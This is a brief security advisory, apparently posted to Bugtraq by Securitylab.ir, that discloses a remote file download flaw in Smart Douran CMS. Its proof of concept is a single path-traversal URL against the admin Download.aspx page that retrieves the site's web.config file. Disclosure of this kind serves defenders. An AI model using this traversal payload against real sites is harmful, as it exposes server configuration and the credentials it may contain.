Smart Douran CMS Remote File Download

From: info@securitylab.ir
To: bugtraq@securityfocus.com
Cc:
Subject: Smart Douran CMS Remote File Download
Date:


#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: Smart Douran CMS
# Vendor: http://smartdouran.ir
#################################################################  
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
# 2008-08-11 - Found Vulnerability
# 2010-05-19 - Public disclosure
#################################################################
Vulnerability:  
http://site.com/Admin/ImportExport/Download.aspx?filename=../../web.config 
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://Pouya.Securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.